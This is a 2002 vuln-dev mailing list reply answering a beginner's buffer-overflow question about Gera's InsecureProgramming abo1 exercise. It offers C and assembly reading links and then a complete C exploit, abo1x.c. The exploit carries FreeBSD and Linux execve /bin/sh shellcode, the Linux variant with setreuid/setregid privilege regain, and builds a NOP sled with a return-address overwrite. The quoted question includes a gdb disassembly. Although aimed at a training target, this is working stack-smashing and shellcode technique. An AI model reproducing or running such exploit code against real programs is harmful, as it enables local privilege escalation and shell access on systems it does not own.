RE: Assembler/C References

From: Claes Nyberg (md0claes@mdstud.chalmers.se)
Date: 07/17/02


Date: Wed, 17 Jul 2002 00:23:37 +0200 (MET DST)
From: Claes Nyberg <md0claes@mdstud.chalmers.se>
To: <vuln-dev@securityfocus.com>


You need to know what the execution flow of the program you want to exploit
look like. In order to "see" this, you need to know how memory and the CPU
works on the target architecture.

My advice is that you write a program in C, and convert each routine into
assembly when it is finished. This way you learn enough to understand
smashing the stack for fun and profit, which will guide you through the
shellcode and buffer overflow exploit process.

C links:
http://www.cee.hw.ac.uk/~rjp/Coursewww/Cwww/index.html
http://www.erlenstar.demon.co.uk/unix/faq_toc.html
http://users.actcom.co.il/~choo/lupg/tutorials/
http://www.whitefang.com/sup/secure-faq.html
http://www.developerweb.net/sock-faq/

Assembly links:
http://webster.cs.ucr.edu/Page_AoALinux/aoa.pdf.gz
http://webster.cs.ucr.edu/
http://linuxassembly.org/
http://lsd-pl.net/documents/asmcodes-1.0.2.pdf
http://segfault.net/~scut/cpu/

// CMN

-- Begin abo1x.c --

/*
 * Solution to
 * http://community.core-sdi.com/~gera/InsecureProgramming/abo1.html
 *
 * Claes M. Nyberg <md0claes@mdstud.chalmers.se>
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>

/* buf + 4 = ret */
#define BUFFSIZE (256+8)
#define NOP 0x90

#define FBSD_PROG "./abo1-fbsd"
#define LINUX_PROG "./abo1-linux"

#define FREEBSD_OFFSET 480
#define LINUX_OFFSET 400

/*
 * FreeBSD shellcode - execv /bin/sh
 */
static char fbsdcode[] =
    "\x31\xc0" /* xorl %eax, %eax */
    "\x50" /* pushl %eax */
    "\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */
    "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
    "\x89\xe3" /* movl %esp, %ebx */
    "\x50" /* pushl %eax */
    "\x53" /* pushl %ebx */
    "\x89\xe2" /* movl %esp, %edx */
    "\x50" /* pushl %eax */
    "\x52" /* pushl %edx */
    "\x53" /* pushl %ebx */
    "\x50" /* pushl %eax */
    "\xb0\x3b" /* movb $0x3b, %al */
    "\xcd\x80" /* int $0x80 */
    "\x31\xc0" /* xorl %eax, %eax */
    "\x40" /* inc %eax */
    "\x50" /* pushl %eax */
    "\x50" /* pushl %eax */
    "\xcd\x80"; /* int $0x80 */

/*
 * Linux shellcode
 * setreuid(geteuid()),setregid(getegid()), execv /bin/sh
 */
static char linuxcode[] =
    "\xb9\xff\xff\xff\xff" /* movl $-1, %ecx */
    "\x31\xc0" /* xorl %eax, %eax */
    "\xb0\x31" /* movb $0x31, %al */
    "\xcd\x80" /* int $0x80 */
    "\x89\xc3" /* movl %eax, %ebx */
    "\xb0\x46" /* movb $0x46, %al */
    "\xcd\x80" /* int $0x80 */
    "\x31\xc0" /* xorl %eax, %eax */
    "\xb0\x32" /* movb $0x32, %al */
    "\xcd\x80" /* int $0x80 */
    "\x89\xc3" /* movl %eax, %ebx */
    "\xb0\x47" /* movb $0x47, %al */
    "\xcd\x80" /* int $0x80 */
    "\x31\xd2" /* xorl %edx, %edx */
    "\x52" /* pushl %edx */
    "\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */
    "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
    "\x89\xe3" /* movl %esp, %ebx */
    "\x52" /* pushl %edx */
    "\x53" /* pushl %ebx */
    "\x89\xe1" /* movl %esp, %ecx */
    "\xb0\x0b" /* movb $0xb, %al */
    "\xcd\x80" /* int $0x80 */
    "\x31\xc0" /* xorl %eax, %eax */
    "\x40" /* inc %eax */
    "\xcd\x80"; /* int $0x80 */

u_long
get_esp(void)
{
    asm("movl %esp, %eax");
}

int
main(int argc, char *argv[])
{
    u_char buf[BUFFSIZE+1];
    u_char *code;
    u_char *prog;
    u_long addr;

    addr = get_esp() + 20 + BUFFSIZE;

    if (argc < 2) {
        printf("Usage: %s <linux | freebsd> [offset]\n", argv[0]);
        exit(1);
    }
    else if (!strncmp(argv[1], "linux")) {
        code = linuxcode;
        prog = LINUX_PROG;
        addr -= LINUX_OFFSET;
    }
    else if (!strncmp(argv[1], "freebsd")) {
        code = fbsdcode;
        prog = FBSD_PROG;
        addr -= FREEBSD_OFFSET;
    }
    else
        exit(1);

    if (argv[2])
        addr = get_esp() + 20 + BUFFSIZE - strtoul(argv[2], NULL, 0);

    /* Set NOP's */
    memset(buf, NOP, BUFFSIZE);

    /* Copy shellcode */
    memcpy(&buf[BUFFSIZE - strlen(code) -30], code, strlen(code));

    /* Set return address */
    *((u_long *)&buf[260]) = addr;
    buf[BUFFSIZE] = '\0';

    fprintf(stderr, "Using address 0x%2x\n", *((u_long *)&buf[260]));
    execlp(prog, prog, buf, NULL);
    exit(1);
}

-- End abo1x.c --

------------------------------------------------------------------------------
Home: http://www.mdstud.chalmers.se/~md0claes/
------------------------------------------------------------------------------
Citation :
The number of UNIX installations has grown to 10, with more expected.
_The UNIX Programmer's Manual_, Second Edition, June, 1972
------------------------------------------------------------------------------

On Tue, 16 Jul 2002, Jeremy Junginger wrote:

> Hey guys,
> Thanks for all of the great feedback about assembler and c. I was
> playing with the code at:
> http://community.core-sdi.com/~gera/InsecureProgramming/abo1.html
> (Thanks for the link, Claes)
> And if it is run, it produces a segmentation fault. After running gdb
> against the program, I obtain the following data:
>
> [rewt@n00bB0x]# gdb abo1
>
> Copyright 2001 Free Software Foundation, Inc.
> GDB is free software, covered by the GNU General Public License, and you
> are
> welcome to change it and/or distribute copies of it under certain
> conditions.
> Type "show copying" to see the conditions.
> There is absolutely no warranty for GDB. Type "show warranty" for
> details.
> This GDB was configured as "i386-redhat-linux"...
> (gdb) disass main
> Dump of assembler code for function main:
> 0x8048460 <main>: push %ebp
> 0x8048461 <main+1>: mov %esp,%ebp
> 0x8048463 <main+3>: sub $0x108,%esp
> 0x8048469 <main+9>: sub $0x8,%esp
> 0x804846c <main+12>: mov 0xc(%ebp),%eax
> 0x804846f <main+15>: add $0x4,%eax
> 0x8048472 <main+18>: pushl (%eax)
> 0x8048474 <main+20>: lea 0xfffffef8(%ebp),%eax
> 0x804847a <main+26>: push %eax
> 0x804847b <main+27>: call 0x804834c <strcpy>
> 0x8048480 <main+32>: add $0x10,%esp
> 0x8048483 <main+35>: leave
> 0x8048484 <main+36>: ret
> 0x8048485 <main+37>: lea 0x0(%esi),%esi
> 0x8048488 <main+40>: nop
> 0x8048489 <main+41>: nop
> 0x804848a <main+42>: nop
> 0x804848b <main+43>: nop
> 0x804848c <main+44>: nop
> 0x804848d <main+45>: nop
> 0x804848e <main+46>: nop
> 0x804848f <main+47>: nop
> End of assembler dump.
> (gdb) quit
>
> [rewt@n00bB0x]#
>
> I guess I don't really know where to go from here. I see that the
> buffer has space form 256 bytes. Okay, so I run ./abo1 AAAAAAAA(256
> times) and it runs okay, then when I run ./abo1 with AAAA(more than
> 256X) it returns with a segmentation fault. The part I'm not
> understanding is, after I've overflowed the buffer, how do I know where
> the next bytes will be stored? Will they be stored at the next memory
> address (in this case 0x8048480)? Once you know where they are stored,
> how can you append your code, do you just do a
> AAAAAA(howevermanytimesyouneedit) and then append your code to the end
> of it?
>
> Thanks for fielding these beginner questions. They're embarrassing to
> ask, but everyone's gotta start somewhere.
>
> -Jeremy
>



Relevant Pages

  • Doubts in shellcode !?
    ... I'm reading a tutorial about shellcode, ... That will execute the /bin/sh. ... And we must, compile it, and open gdb and get the hex value with ... x/xb main+3 ...
    (comp.security.unix)
  • Re: Problem exploiting a CGI overflow
    ... Second, I wrote a shellcode without 0x0b,0x0c, but it didnt work because ... int main(int argc, char *argv) { ... $ ./post.cgi < buffer ... gdb: Symbol `emacs_ctlx_keymap' has different size in shared object, ...
    (Vuln-Dev)
  • Re: Linux mmap(90)
    ... > Sorry, wenn du schon Schwierigkeiten hast, das rauszufinden, wird ... > Assembler unter Linux wohl kaum eine Freude für dich werden. ... > Und wenn du nun wissen willst, was open genau macht, schau es dir im ... > GDB is free software, covered by the GNU General Public License, and you are ...
    (de.comp.lang.assembler.x86)
  • Re: shellcode -> asm?
    ... shell code is in a the char array "shellcode". ... GNU gdb 2002-08-18-cvs ... For most of the attacks I have, ...
    (Vuln-Dev)
  • Re: Problem exploiting a CGI overflow
    ... looking at the gdb output- it looks like you are on the right ... There is a problem with the shellcode, ... >> char txt; ... >> Violación de segmento (core dumped) ...
    (Vuln-Dev)